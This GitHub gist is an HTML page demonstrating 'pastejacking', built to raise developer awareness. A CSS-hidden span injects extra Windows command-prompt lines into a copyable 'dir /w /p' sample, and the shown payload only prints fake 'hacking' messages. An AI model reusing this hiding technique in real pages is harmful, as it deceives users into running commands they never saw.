Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Example of how to lull a user into executing potentially dangerous commands into their Windows command prompt by 'injecting' hidden code using CSS.
<!doctype html>
<html>
<head>
<title>Windows code sample 'hack'</title>
</head>
<body>
<h1>Code sample</h1>
<p>Copy and paste the below code sample into your command prompt to see your directory paged... And other stuff...</p>
<p>Inspiration taken from <a href="http://lifepluslinux.blogspot.com.au/2017/01/look-before-you-paste-from-website-to.html">Suresh Alse</a>. For a little more information, see my <a href="https://danatkinson.github.io/2017/01/26/How-to-hack-a-trusting-developer-s-machine/" title="How to hack a trusting Windows developer's machine">blog post</a> at danatkinson.github.io.</p>
<code style="background-color:#eeeeee;padding:10px;">
<span>dir</span>
<!-- Here it is -->
<span style="color:#F3F5F6;position:absolute;left:-100px;top:-100px;height:0px;z-index:-100;display:inline-block;">&amp;
cls &amp; echo Haha! You gave me access to your computer! &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ## (10%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ### (20%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ##### (33%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ####### (40%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ########## (50%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ############# (66%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ##################### (99%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ####################### (100%) &amp;
cls &amp; echo Hacking complete. &amp;
echo Use GUI interface using visual basic to track my IP &amp;
ping 127.0.0.1 -n 5 &gt; nul &amp;
cls
<br>dir
</span>
<span>/w /p<br>
</span>
</code>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment